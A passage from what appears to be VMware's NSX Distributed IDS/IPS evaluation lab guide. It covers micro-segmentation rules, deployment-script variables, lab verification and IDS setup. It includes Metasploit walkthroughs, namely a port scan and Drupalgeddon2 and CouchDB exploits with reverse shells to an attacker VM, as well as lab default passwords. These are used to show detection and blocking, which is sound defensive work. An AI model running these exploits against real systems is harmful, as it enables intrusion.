222 | * Applied To: **APP1-WEB**
223 | * Action: **Allow**
224 | 8. Rule 2
225 | * Name: **APP-TIER-ACCESS**
226 | * Source: **APP1-WEB**
227 | * Destination: **APP1-APP**
228 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **5984** (The CouchDB service listens on this port)
229 | * Applied To: **APP1-WEB** , **APP1-APP**
230 | * Action: **Allow**
231 | 3. Now that we micro-segmented APP1, let's do the same for APP2. Click **ADD POLICY**
232 | 4. Click **New Policy** and change the name of the policy to **APP2 Micro-Segmentation**
233 | 5. Check the checkbox next to the **APP2 Micro-Segmentation** Policy
234 | 6. Click **ADD RULE** twice, and configure the new new rules as per below steps
235 | 7. Rule 1
236 | * Name: **WEB-TIER-ACCESS**
237 | * Source: **Any**
238 | * Destination: **APP2-WEB**
239 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **8080** (The Drupal service listens on this port)
240 | * Profiles: **HTTP** (This is a Layer-7 App-ID)
241 | * Applied To: **APP2-WEB**
242 | * Action: **Allow**
243 | 8. Rule 2
244 | * Name: **APP-TIER-ACCESS**
245 | * Source: **APP2-WEB**
246 | * Destination: **APP2-APP**
247 | * Services: Click **Raw Port-Protocols** and **ADD Service Entry**. Add a new entry of Service Type **TCP** and Destination Port **5984** (The CouchDB service listens on this port)
248 | * Applied To: **APP2-WEB** , **APP2-APP**
249 | * Action: **Allow**
250 | 9. We now have configured the appropriate allow-list policy for APP1 and APP2. Now we can change the default Distributed Firewall action from **Allow** to **Drop** in order to block all traffic except for the traffic we just allowed for our applications to function.
251 | 10. Click the down arrow next to the **Default Layer3 Section** Policy and change the action of the **Default Layer 3 rule** from **Allow** to **Drop**
252 | 11. Click **PUBLISH** to save and publish your changes.
253 |
254 | 
255 |
256 | ***Open a SSH/Console session to the External VM***
257 | 1. If your computer has access to the IP address you've assigend to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
258 | * Username **vmware**
259 | * Password **VMware1!**
260 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
261 |
262 | ***Run through the the lateral attack scenario (again)***
263 |
264 | In order to reduce the time needed for this, you can run the **attack2** script from the **external VM** which will initiate the complete lateral attack scenario without needing any manual metasploit steps. If you prefer, you can also manually go though these steps (See the chapter on Lateral Movement Scenario)
265 |
266 | 1. Type **sudo ./attack2.sh** to run the attack scenario
267 |
268 | ```console
269 | vmware@ubuntu:~$ ./attack2.sh
270 | [sudo] password for vmware:
271 |
272 |
273 | Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
274 | EFLAGS: 00010046
275 | eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
276 | esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
277 | ds: 0018 es: 0018 ss: 0018
278 | Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)
279 |
280 |
281 | Stack: 90909090990909090990909090
282 | 90909090990909090990909090
283 | 90909090.90909090.90909090
284 | 90909090.90909090.90909090
285 | 90909090.90909090.09090900
286 | 90909090.90909090.09090900
287 | ..........................
288 | cccccccccccccccccccccccccc
289 | cccccccccccccccccccccccccc
290 | ccccccccc.................
291 | cccccccccccccccccccccccccc
292 | cccccccccccccccccccccccccc
293 | .................ccccccccc
294 | cccccccccccccccccccccccccc
295 | cccccccccccccccccccccccccc
296 | ..........................
297 | ffffffffffffffffffffffffff
298 | ffffffff..................
299 | ffffffffffffffffffffffffff
300 | ffffffff..................
301 | ffffffff..................
302 | ffffffff..................
303 |
304 |
305 | Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00
306 | Aiee, Killing Interrupt handler
307 | Kernel panic: Attempted to kill the idle task!
308 | In swapper task - not syncing
309 |
310 |
311 | =[ metasploit v5.0.95-dev ]
312 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
313 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
314 | + -- --=[ 7 evasion ]
315 |
316 | Metasploit tip: Writing a custom module? After editing your module, why not try the reload command
317 |
318 | [*] Processing attack2.rc for ERB directives.
319 | resource (attack2.rc)> use exploit/unix/webapp/drupal_drupalgeddon2
320 | [*] No payload configured, defaulting to php/meterpreter/reverse_tcp
321 | resource (attack2.rc)> set RHOST 192.168.10.101
322 | RHOST => 192.168.10.101
323 | resource (attack2.rc)> set RPORT 8080
324 | RPORT => 8080
325 | resource (attack2.rc)> exploit -z
326 | [*] Started reverse TCP handler on 10.114.209.151:4444
327 | [*] Exploit completed, but no session was created.
328 | resource (attack2.rc)> route add 192.168.20.0/24 1
329 | [-] Not a session: 1
330 | resource (attack2.rc)> use exploit/linux/http/apache_couchdb_cmd_exec
331 | [*] Using configured payload linux/x64/shell_reverse_tcp
332 | resource (attack2.rc)> set LPORT 4445
333 | LPORT => 4445
334 | resource (attack2.rc)> set LHOST 10.114.209.151
335 | LHOST => 10.114.209.151
336 | resource (attack2.rc)> set RHOST 192.168.20.100
337 | RHOST => 192.168.20.100
338 | resource (attack2.rc)> exploit -z
339 | [*] Started reverse TCP handler on 10.114.209.151:4445
340 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
341 | [*] Exploit completed, but no session was created.
342 | resource (attack2.rc)> set LPORT 4446
343 | LPORT => 4446
344 | resource (attack2.rc)> set RHOST 192.168.20.101
345 | RHOST => 192.168.20.101
346 | resource (attack2.rc)> exploit -z
347 | [*] Started reverse TCP handler on 10.114.209.151:4446
348 | [-] Exploit aborted due to failure: unknown: Something went horribly wrong and we couldn't continue to exploit.
349 | [*] Exploit completed, but no session was created.
350 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) >
351 | ```
352 |
353 | 2. Type **sessions -l** to confirm that this time no reverse shell sessions were established.
354 |
355 | ```console
356 | msf5 exploit(linux/http/apache_couchdb_cmd_exec) > sessions -l
357 |
358 | Active sessions
359 | ===============
360 |
361 | No active sessions.
362 | ```
363 | > **Note**: The micro-segmentation policy applies allows the applictions to function but reduces the attack surface by preventing any communication to a service that is not explicitely allowed.
364 |
365 | ***Confirm IDS/IPS Events show up in the NSX Manager UI***
366 | 1. In the NSX Manager UI, navigate to Security --> East West Security --> Distributed IDS
367 | 2. Confirm 2 signatures have fired:
368 | * Signature for **DrupalGeddon2**, with **APP-1-WEB-TIER** as Affected VM
369 | * Signature for **Remote Code execution via a PHP script**, with **APP-1-WEB-TIER** as Affected VM
370 |
371 | 
372 |
373 | > **Note**: While the initial DrupalGeddon exploit has completed, the distributed firewall has prevented the reverse shell from being established from APP-1-WEB-TIER. As a result, the attacker is unable to move laterally in the environment. In addition, you can enable a **detect & prevent** policy once again to ensure the initial exploit is prevented.
374 |
375 | This completes the NSX Distributed IDS/IPS Evaluation and Optional exercises.
376 |
377 | ---
378 |
379 | [***Next Step: 11. Conclusion***](11-Conclusion.md)
380 |
--------------------------------------------------------------------------------
/3.1/docs/11-Conclusion.md:
--------------------------------------------------------------------------------
1 | ## Conclusion
2 | Congratulations, you have now completed the NSX Distributed IDS/IPS lab/evaluation!
3 |
4 | Throughout this process, you should have disovered the unique benefits of having IDS/IPS built-in to the infrastructure versus bolted-on securitry controls.
5 | Please reach out to your VMware NSX representative with any feedback you have about the product or about the evaluation Process.
6 |
7 | ## Additional Resources
8 | To learn more about the NSX Distributed IDS/IPS, check out the below resources:
9 | * [NSX Distributed IDS/IPS Overview page](https://www.vmware.com/products/nsx-distributed-ids-ips.html)
10 | * [NSX Service Defined Firewall Overview page](https://www.vmware.com/security/internal-firewall.html)
11 | * [Lightboard: Overview of the NSX Distributed IDS/IPS](https://www.youtube.com/watch?v=WUpq1kNfKB8)
12 | * [VMworld 2020: IDS/IPS at the Granularity of a workload and the Scale of the SDDC with NSX](https://www.vmworld.com/en/video-library/video-landing.html?sessionid=1588253233859001YcvN)
13 |
14 |
--------------------------------------------------------------------------------
/3.1/docs/2-CustomizeScript.md:
--------------------------------------------------------------------------------
1 |
2 | ## 2. Customize Deployment Script Variables
3 | **Estimated Time to Complete: 60 minutes**
4 |
5 | Before you can run the [script](https://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment-3.1.ps1), you will need to [download](hhttps://github.com/vmware-nsx/eval-docs-ids-ips/blob/master/Nested%20Lab%20Deployment-3.1.ps1) and edit the script and update a number of variables to match your deployment environment. Details on each section is described below including actual values used my sample lab environment. The variables that need to adjusted are called out specifically. Other variables can in almost all cases be left to their default values.
6 |
7 | In this example below, I will be using a single /27 subnet(10.114.209.128/27) on a single port-group (VLAN-194) which all the VMs provisioned by the automation script will be connected to. It is expected that you will have a similar configuration which is the most basic configuration for PoV and testing purposes.
8 |
9 | | Name | IP Address | Function | Default Credentials |
10 | |----------------------------|--------------------------------|------------------------------|------------------------------|
11 | | pov-vcsa | 10.114.209.143 | vCenter Server |administrator@vsphere.local/VMware1! |
12 | | Nested_ESXi_1 | 10.114.209.140 | ESXi |root/VMware1!
13 | | Nested_ESXi_2 | 10.114.209.141 | ESXi |root/VMware1!
14 | | Nested_ESXi_3 | 10.114.209.142 | ESXi |root/VMware1!
15 | | pov-nsx | 10.114.209.149 | NSX-T Manager |admin/VMware1!VMware1!
16 | | pov-nsx-edge | 10.114.209.150 | NSX-T Edge |admin/VMware1!
17 | | T0-uplink | 10.114.209.148 | T0 GW Interface IP |n.a.
18 | | TunnelEndpointGateway | 10.114.209.129 | Existing default GW |n.a.
19 | | T0 Static Default GW | 10.114.209.129 | Existing default GW |n.a.
20 | | TEP Pool | 10.114.209.144-10.114.209.147 | Tunnel Endpoint IPs |n.a.
21 | | External VM | 10.114.209.151 | Attacker (Metasploit) VM |vmware/VMware1!
22 |
23 | > **Note:** The remainder of this page contains the sections and variables within the script that should be modified to match the parameters of your environment. Other sections and variables within the script should be left at their pre-configured defaults.
24 |
25 | This section describes the credentials to your physical environment vCenter Server in which the nested lab environment will be deployed to. Make sure to adjust **all** of the below variables to match your physical environment vCenter:
26 | ```console
27 | # vCenter Server used to deploy vSphere with NSX lab
28 | $VIServer = "vcenter-north.lab.svanveer.pa"
29 | $VIUsername = "administrator@vsphere.local"
30 | $VIPassword = "VMware1!"
31 | ```
32 |
33 | This section describes the location of the files required for deployment. This includes the OVAs for ESXi, NSX Manager and NSX Edge, the extracted bundle for vCenter and OVAs for the external and victim VMs. Update the below variables with the actual **location of the downloaded OVAs/extracted files** on the local machine you run this PowerShell script from
34 |
35 | ```console
36 | # Full Path to both the Nested ESXi 7.0 VA, Extracted VCSA 7.0 ISO, NSX-T OVAs, External and Victim VM OVAs
37 | $NestedESXiApplianceOVA = "C:\Users\stijn\downloads\ESXI\Nested_ESXi7.0_Appliance_Template_v1.ova"
38 | $VCSAInstallerPath = "C:\Users\stijn\downloads\VCSA\VMware-VCSA-all-7.0.0-16189094"
39 | $NSXTManagerOVA = "C:\Users\stijn\downloads\NSXMgr\nsx-unified-appliance-3.0.0.0.0.15946739.ova"
40 | $NSXTEdgeOVA = "C:\Users\stijn\downloads\NSXEdge\nsx-edge-3.0.0.0.0.15946012.ova"
41 | $ExternalVMOVA = "C:\Users\stijn\downloads\Attacker\External-VM.ova"
42 | $VictimVMOVA = "C:\Users\stijn\downloads/Victim\Victim-VM.ova"
43 | ```
44 | > **Note:** The path to the VCSA Installer must be the extracted contents of the ISO
45 |
46 |
47 | This section defines the number of Nested ESXi VMs to deploy along with their associated IP Address(s). The names are merely the display name of the VMs when deployed. At a minimum, you should deploy at least three hosts, but you can always add additional hosts and the script will automatically take care of provisioning them correctly. Adjust the **IP addresses** for the 3 below hosts. For simplicity, these IP addresses should part of the same Management subnet for the nested vCenter and NSX Manager.
48 | ```console
49 | # Nested ESXi VMs to deploy - Replace IP addresses (nested ESXi VMMKnic) to match the assigned subnet in your physical eenvironment
50 | $NestedESXiHostnameToIPs = @{
51 | "Nested_ESXi_1" = "10.114.209.140"
52 | "Nested_ESXi_2" = "10.114.209.141"
53 | "Nested_ESXi_3" = "10.114.209.142"
54 | }
55 | ```
56 |
57 | This section describes the VCSA deployment configuration such as the VCSA deployment size, Networking & SSO configurations. If you have ever used the VCSA CLI Installer, these options should look familiar. Adjust the **IP address** and **Prefix (Subnet Mask Bits)** to match the desired IP address of the nested ESXi. Use the Same IP address as the **hostname**, unless you can add an FQDN entry to your DSN server.
58 | ```console
59 | $VCSADeploymentSize = "tiny"
60 | $VCSADisplayName = "pov-vcsa"
61 | $VCSAIPAddress = "10.114.209.143" #Set to the desired IP address
62 | $VCSAHostname = "10.114.209.143" #Use IP if you don't have valid DNS.
63 | $VCSAPrefix = "27" #Set to the appropriate prefix
64 | $VCSASSODomainName = "vsphere.local"
65 | $VCSASSOPassword = "VMware1!"
66 | $VCSARootPassword = "VMware1!"
67 | $VCSASSHEnable = "true"
68 | ```
69 |
70 | This section describes the physical location as well as the generic networking settings applied to Nested ESXi VCSA & NSX VMs. The following variable should be defined by users **VMDataceter**, **VMCluster**, **VMNetwork** and **VMdatastore**. Replace all the **IP addresses** and **netmaks** with the appropriate IP addresses/netmask to match your phyiscal environment. For the other values, default values are sufficient.
71 | ```console
72 | $VMDatacenter = "PaloAlto-Main" # Existing Datacenter on the Physical vCenter
73 | $VMCluster = "Physical-3" #Existing Cluster in the above Datacenter on the Physical vCenter
74 | $VMNetwork = "VLAN-194" #Existing port-group on the physical host/ to use and connect all deployed workloads (except for victim VMs) to
75 | $VMDatastore = "NFS" #Existing Datastore on the physical host/vCenter
76 | $VMNetmask = "255.255.255.224" #Netmask of the designated existing subnet which will be used to connect all deployed workloads (except for victim VMs) to
77 | $VMGateway = "10.114.209.129" #Existing Gateway allowing lab management components to reach the outside environment
78 | $VMDNS = "10.114.222.70" #Existing DNS server that will be configured on lab management componenets
79 | $VMNTP = "10.20.145.1" #Existing NTP server that will be configured on lab management components
80 | $VMPassword = "VMware1!"
81 | $VMDomain = "lab.svanveer.pa"
82 | $VMSyslog = "" # Do not set this unless you want to send logs to an existing and reachable Syslog collector/SIEM.
83 | $VMFolder = "NSX PoV" #The deployment script will create this folder
84 | ```
85 |
86 | This section describes the NSX-T configurations, the following variables must be defined by users and the rest can be left as defaults.
87 | **$NSXLicenseKey**, **$NSXVTEPNetwork**, **$T0GatewayInterfaceAddress**, **$T0GatewayInterfacePrefix**, **$T0GatewayInterfaceStaticRouteAddress** and the **NSX-T Manager**, **TEP IP Pool** and **Edge** Sections
88 | ```console
89 | # NSX-T Configuration - Adjust variables (license key, VTEPNetwork) to match your environment
90 | NSXLicenseKey = "xxxxx-xxxxx-xxxxx-xxxxx-xxxxx" #Replace with valid NSX License key
91 | $NSXRootPassword = "VMware1!VMware1!"
92 | $NSXAdminUsername = "admin"
93 | $NSXAdminPassword = "VMware1!VMware1!"
94 | $NSXAuditUsername = "audit"
95 | $NSXAuditPassword = "VMware1!VMware1!"
96 | $NSXSSHEnable = "true"
97 | $NSXEnableRootLogin = "true"
98 | $NSXVTEPNetwork = "VLAN-194" # Replace with the appropriate pre-existing port-group
99 |
100 | # TEP IP Pool - Replace IP addresses to match the physical environment subnet you've allocated (i.e management network)
101 | $TunnelEndpointName = "TEP-IP-Pool"
102 | $TunnelEndpointDescription = "Tunnel Endpoint for Transport Nodes"
103 | $TunnelEndpointIPRangeStart = "10.114.209.144"
104 | $TunnelEndpointIPRangeEnd = "10.114.209.147"
105 | $TunnelEndpointCIDR = "10.114.209.128/27"
106 | $TunnelEndpointGateway = "10.114.209.129" #Default Gateway of the Management Network
107 |
108 | # T0 Gateway - Adjust T0GatewayInterfaceAddress and Prefix as well as StaticRoute Address
109 | $T0GatewayName = "PoV-T0-Gateway"
110 | $T0GatewayInterfaceAddress = "10.114.209.148" # should be a routable address
111 | $T0GatewayInterfacePrefix = "27" #adjust to the correct prefix for your enviornment
112 | $T0GatewayInterfaceStaticRouteName = "PoV-Static-Route"
113 | $T0GatewayInterfaceStaticRouteNetwork = "0.0.0.0/0"
114 | $T0GatewayInterfaceStaticRouteAddress = "10.114.209.129" # IP address of the next hop router in your environment. This can be set to an invalid IP address to ensure the vulnerable workloads remain isolated from the rest of the environment
115 |
116 | # NSX-T Manager Configurations - Replace IP addresses
117 | $NSXTMgrDeploymentSize = "small"
118 | $NSXTMgrvCPU = "4"
119 | $NSXTMgrvMEM = "16"
120 | $NSXTMgrDisplayName = "pov-nsx-manager"
121 | $NSXTMgrHostname = "10.114.209.149" # Replace with the desired IP address for the NSX Manager
122 | $NSXTMgrIPAddress = "10.114.209.149" # Replace with the desired IP address for the NSX Manager
123 |
124 | # NSX-T Edge Configuration
125 | $NSXTEdgeDeploymentSize = "medium"
126 | $NSXTEdgevCPU = "4"
127 | $NSXTEdgevMEM = "8"
128 | $NSXTEdgeName = "poc-nsx-edge"
129 | $NSXTEdgeHostnameToIPs = @{
130 | $NSXTEdgeName = "10.114.209.150" #Replace with the desired IP address for the NSX Edge Management Interface
131 |
132 | }
133 | ```
134 |
135 | ---
136 | [***Next Step: 3. Run Deployment Script***](3-RunScript.md))
137 |
--------------------------------------------------------------------------------
/3.1/docs/3-RunScript.md:
--------------------------------------------------------------------------------
1 | ## 3. Run Deployment Script
2 | **Estimated Time to Complete: 90 minutes**
3 | Once you have saved your changes, you can now run the PowerCLI script as you normally would.
4 |
5 | Here is a screenshot of running the script if all basic pre-reqs have been met and the confirmation message before starting the deployment:
6 | 
7 |
8 | Once the deployment completes, you will receive a confirmation and can now move on with the next step:
9 | 
10 |
11 |
12 | > **Note**: Deployment time will vary based on underlying physical infrastructure resources. On average, it can take between 45 minutes to 90 minutes.
13 |
14 | ---
15 |
16 | [***Next Step: 4. Verify Lab Deployment***](4-VerifyDeployment.md)
17 |
--------------------------------------------------------------------------------
/3.1/docs/4-VerifyDeployment.md:
--------------------------------------------------------------------------------
1 |
2 | ## 4. Verify Lab Deployment
3 | **Estimated Time to Complete: 30 minutes**
4 |
5 | Once the Deployment Script has completed the installation and setup process. Your lab environment is fully ready to start testing the NSX Distributed IDS/IPS. Verify vCenter and NSX has been configured as intended.
6 |
7 | **Physical Infrastructure Host/vCenter**
8 |
9 | 
10 |
11 | **Logical Nested Lab**
12 | 
13 |
14 | **Validate VM Deployment in the physical Environment**
15 |
16 | Login to the physial environment vcenter and Verify 6 VMs have been deployed, are up and running and are connected to the appropriate port-group:
17 | * 3 nested ESXI
18 | * 1 NSX Manager
19 | * 1 NSX Edge
20 | * 1 vCenter
21 | * 1 External VM
22 |
23 | 
24 |
25 | Confirm you are able to ping each nested ESXi, the Lab NSX Manager and the Lab vCenter.
26 |
27 | **Configure IP address and static route on the External VM**
28 |
29 | 
30 |
31 | You will need to manually change the IP address of the external VM to an IP address in the same managment subnet you used for vCenter/NSX Manager and the rest of the environment. You will also need to adjust the static route so the external VM is able to reach the DMZ subnet inside the nested lab environemnt. There is no need for a default gateway to be configured as the only route the external VM needs is to the DMZ segment.
32 |
33 | From the physical environent vCenter, open a console to **External VM** and take the following steps:
34 | * Login with **vmware**/**VMware1!**
35 | * Type **sudo nano /etc/network/interfaces** to open the network configuration file
36 | 
37 | * For interface **ens160** change the **address** and **netmask** to match the appropriate settings for your enviornment
38 | * In the line that stats with **up route add**, change the **gw address** (10.114.209.148 in my example) to the **T0 Uplink interface IP address**
39 | * Type **^O** (**Control-O**) to save the changes in Nano.
40 | * Type **^X** (**Control-X**) to exit Nano.
41 | * Type **sudo ip addr flush ens160** to clear the previously set IP address
42 | * Type **sudo systemctl restart networking.service** to restart the networking service and realize the new IP address.
43 |
44 | **Verify Nested Lab vCenter**
45 |
46 | Login to lab vCenter and verify the cluster of 3 nested ESXi appliances is functional and 4 vulnerable VMs have been deployed on the cluster:
47 | * APP-1-WEB-TIER connected to **DMZSegment** Portgroup
48 | * APP-2-WEB-TIER connected to **DMZSegment** Portgroup
49 | * APP-1-APP-TIER connected to **InternalSegment** Portgroup
50 | * APP-2-APP-TIER connected to **InternalSegment** Portgroup
51 |
52 | 
53 |
54 | **Verify Network Segmenets were created**
55 |
56 | 1. Login to the Lab NSX Manager Web-UI.
57 | 2. In the NSX Manager UI, navigate to Networking --> Segments --> Segments
58 | 3. Verify 3 segmetns have been deployed
59 | * **DMZSegment** - Overlay-based semgnet connecting the Web-tier workloads
60 | * **InternalSegment** - OVerlay-based semgent connecting the App-tier workloads
61 | * **PoC-Segment** - VLAN-backed segment providing uplink and management connectivity
62 |
63 | 
64 |
65 | **Determine the IP address of every nested workload**
66 |
67 | 1. In the NSX Manager UI, navigate to Inventory --> Virtual Machines
68 | 2. Click **View Details**
69 | 3. Note the IP addresses for the 4 VMs that were deployed. You will need to what IP address has been assigned to every workloads in the next exercises.
70 |
71 | 
72 | 
73 |
74 | > **Note**: DHCP Server has been pre-configured on NSX and should be assigning an IP address to each of the deployed nested workloads on the DMZ and Internal segments.
75 |
76 |
77 | **Confirm NAT configuration**
78 |
79 | 
80 |
81 | 1. In the NSX Manager UI, nativate to Networking --> NAT
82 | 2. Confirm a single **SNAT** rule exists, with the **Internal Subnet** as a source, and the **T0 Uplink** IP address as the translated address (10.114.209.148 in my example).
83 |
84 | 
85 |
86 | > **Note**: This NAT rule enables internal VMs to initiate communcation with the outside world.
87 |
88 |
89 | **Confirm TAG Creation and Application**
90 |
91 | 
92 |
93 | 1. In the NSX Manager UI, nativate to Inventory --> Tags
94 | 2. Confirm 6 tags have been added as per below sceenshot
95 | 
96 | 3. Confirm tags were applied to workloads as per the above diagram
97 |
98 | This completes Lab Deployment Verification. You can now move to the next exercise.
99 |
100 | ---
101 |
102 | [***Next Step: 5. Initial IDS/IPS Configuration***](5-InitialConfiguration.md)
103 |
--------------------------------------------------------------------------------
/3.1/docs/5-InitialConfiguration.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ## 5. Initial IDS/IPS Configuration
4 | **Estimated Time to Complete: 30 minutes**
5 |
6 | > **Note**: If you are running though this Evaluation process using a VMWare hosted (OneCloud/HoL) environment, you can skip all the previous modules and start with this lab module (5), as everything has already been deployed.
7 |
8 | Now that we have verified the lab has been deployed correctly, basic NSX networking configuration has been applied and the appropriate vunlerable application VMs have been deployed, we can configure the NSX Distributed IDS/IPS.
9 |
10 | **Create Groups**
11 | 1. In the NSX Manager UI, navigate to Inventory --> Groups
12 | 2. Click **ADD GROUP**
13 | 3. Create a Group with the below parameters. Click Save when done.
14 | * Name **Production Applications**
15 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Production Scope Environment**
16 | 
17 | 3. Create another Group with the below parameters. Click Save when done.
18 | * Name **Development Applications**
19 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Development Scope Environment**
20 | 4. Create another Group with the below parameters. Click Save when done.
21 | * Name **Web-Tier**
22 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals Web-Tier Scope Tier**
23 | 5. Create another Group with the below parameters. Click Save when done.
24 | * Name **App-Tier**
25 | * Compute Members: Membership Criteria: **Virtual Machine Tag Equals App-Tier Scope Tier**
26 | 
27 |
28 | 6. Confirm previously deployed VMs became a member of appropriate groups due to applied tags. Click **View Members** for the 4 groups you created and confirm
29 | * Members of **Development Applications**: **APP-2-APP-TIER**, **APP-2-WEB-TIER**
30 | * Members of **Production Applications**: **APP-1-APP-TIER**, **APP-1-WEB-TIER**
31 | * Members of **Web-Tier**: **APP-1-WEB-TIER**, **APP-2-WEB-TIER**
32 | * Members of **App-Tier Applications**: **APP-1-APP-TIER**, **APP-2-APP-TIER**
33 | 
34 |
35 | > **Note**: Tags were applied to the workloads through the Powershell script used to deploy the lab environment.
36 |
37 | **Apply Evaluation License or ATP license**
38 |
39 | If you are the deployment script to deploy your own nested environment, and if you previously provide an NSX Evalution license key which enables all functionality including IDS/IPS, or if the required license is already present, you can skip this step.
40 | 1. In the NSX Manager UI, navigate to System --> License and upload either an ATP subscription license or an evaluation license
41 | 2. Click **+ADD LICENSE**
42 | 3. Enter a valid license key and click **ADD**
43 |
44 |
45 | **Enable Intrusion Detection**
46 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Settings
47 | 2. Under Enable Intrusion Detection for Cluster(s), change the toggle to **enabled** for the workload cluster
48 |
49 | 
50 |
51 | NSX can automatically update it’s IDS/IPS signatures by checking our cloud-based service. By default, NSX manager will check once per day and we publish new signature update versions every two week (with additional non-scheduled 0-day updates). NSX can also be configured to optionally automatically apply newly updated signatures to all hosts that have IDS enabled.
52 |
53 | **Enable Automated Signature Update propagation**
54 | 1. Under Intrusion Detection Signatures, select **Auto Update new versions (recommended)** in order to propagate the latest signature updates from the cloud to the distributed IDS/IPS instances
55 | 2. Optionally, click **View and Change Versions** and expand one of the signature sets to see what signatures have been added/updated/disabled in this particular release
56 |
57 | > **Note**: if a proxy server is configured for NSX Manager to access the internet, click Proxy Settings and complete the configuration
58 |
59 |
60 | **Create IDS/IPS Profiles**
61 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Profiles
62 | 2. Click **ADD PROFILE**
63 | 3. Create a Profile with the below parameters. Click Save when done.
64 | * Name **Web-FrontEnd**
65 | * Signatures to Include: **Attack Targets**: **Web Server**
66 |
67 | 
68 |
69 | 3. Create another Profile with the below parameters. Click Save when done.
70 | * Name **Databases**
71 | * Signatures to Include: **Products Affected**: **apache couchdb**
72 |
73 | 
74 | 
75 |
76 | **Create IDS Rules**
77 | 1. In the NSX Manager UI, navigate to Security --> Distributed IDS/IPS --> Rules
78 | 2. Click **ADD POLICY**
79 | 3. Create an IDS Policy named **NSX IDPS Evaluation** .
80 | 4. Check the checkbox for the policy you just created and click **ADD RULE**.
81 | 5. Add an IDS Rule with the following parameters
82 | * Name **Web-Tier Policy**
83 | * IDS Profile **Web-FrontEnd**
84 | * Applied to **Web-Tier** (group)
85 | * Mode **Detect Only**
86 | * Leave other settings to defaults
87 | 6. Add another IDS Rule with the following parameters
88 | * Name **App-Tier Policy**
89 | * IDS Profile **Databases**
90 | * Applied to **App-Tier** (group)
91 | * Mode **Detect Only**
92 | * Leave other settings to defaults
93 | 7. Click **Publish**
94 |
95 | 
96 |
97 | You have now successfully configured the NSX Distributed IDS/IPS ! In the next exercise, we will run through a basic attack scenario to confirm intrusion attemtps are detected and get familair with the NSX IDS/IPS Events view.
98 |
99 | ---
100 |
101 | [***Next Step: 6. Basic Attack Scenario***](6-DetectingASimpleIntrusion.md)
102 |
--------------------------------------------------------------------------------
/3.1/docs/6-DetectingASimpleIntrusion.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ## 6. Detecting a Simple Intrusion
4 | **Estimated Time to Complete: 30 minutes**
5 |
6 | In this exercise, we will use **Metasploit** to launch a simple exploit against the **Drupal** service runnning on the **App1-WEB-TIER VM** and confirm the NSX Distributed IDS/IPS was able to detect this exploit attempt.
7 |
8 | 
9 |
10 | **Open a SSH/Console session to the External VM**
11 | 1. If your computer has access to the IP address you've assigend to the **External VM** (10.114.209.151 in my example), open your ssh client and initiate a session to it. Login with the below credentials.
12 | * Username **vmware**
13 | * Password **VMware1!**
14 | 2. **Alternatively**, if your computer does not have access to the **External VM** directly, you can access the VM console from the physical environment vCenter Web-UI.
15 |
16 | **Initiate port-scan against the DMZ Segment**
17 | 1. Type **sudo msfconsole** to launch **Metasploit**. Follow the below steps to initiate a portscan and discover any running services on the **DMZ** subnet. Hit **enter** between every step.
18 | * Type **use auxiliary/scanner/portscan/tcp** to select the portscan module
19 | * Type **set THREADS 50**
20 | * Type **set RHOSTS 192.168.10.0/24** to define the subnets to scan. These should match the **DMZ** Subnet
21 | * Type **set PORTS 8080,5984** to define the ports to scan (Drupal and CouchDB servers)
22 | * Type **run**
23 |
24 | ```console
25 | vmware@ubuntu:~$sudo msfconsole
26 |
27 | IIIIII dTb.dTb _.---._
28 | II 4' v 'B .'"".'/|\`.""'.
29 | II 6. .P : .' / | \ `. :
30 | II 'T;. .;P' '.' / | \ `.'
31 | II 'T; ;P' `. / | \ .'
32 | IIIIII 'YvP' `-.__|__.-'
33 |
34 | I love shells --egypt
35 |
36 |
37 | =[ metasploit v5.0.95-dev ]
38 | + -- --=[ 2038 exploits - 1103 auxiliary - 344 post ]
39 | + -- --=[ 562 payloads - 45 encoders - 10 nops ]
40 | + -- --=[ 7 evasion ]
41 |
42 | Metasploit tip: Tired of setting RHOSTS for modules? Try globally setting it with setg RHOSTS x.x.x.x
43 | msf5 > use auxiliary/scanner/portscan/tcp
44 | msf5 auxiliary(scanner/portscan/tcp) > set THREADS 50
45 | THREADS => 50
46 | msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.10.0/24
47 | RHOSTS => 192.168.10.0/24, 192.168.20.0/24
48 | msf5 auxiliary(scanner/portscan/tcp) > set PORTS 8080,5984
49 | PORTS => 8080,5984
50 | msf5 auxiliary(scanner/portscan/tcp) > run
51 | ```
52 | 2. You should see the below results when the scan completes
53 | ```console
54 | [*] 192.168.10.0/24: - Scanned 28 of 256 hosts (10% complete)
55 | [*] 192.168.10.0/24: - Scanned 52 of 256 hosts (20% complete)
56 | [+] 192.168.10.100: - 192.168.10.100:5984 - TCP OPEN
57 | [+] 192.168.10.100: - 192.168.10.100:8080 - TCP OPEN
58 | [+] 192.168.10.101: - 192.168.10.101:5984 - TCP OPEN
59 | [+] 192.168.10.101: - 192.168.10.101:8080 - TCP OPEN
60 | [*] 192.168.10.0/24: - Scanned 77 of 256 hosts (30% complete)
61 | [*] 192.168.10.0/24: - Scanned 103 of 256 hosts (40% complete)
62 | [*] 192.168.10.0/24: - Scanned 129 of 256 hosts (50% complete)
63 | [*] 192.168.10.0/24: - Scanned 154 of 256 hosts (60% complete)
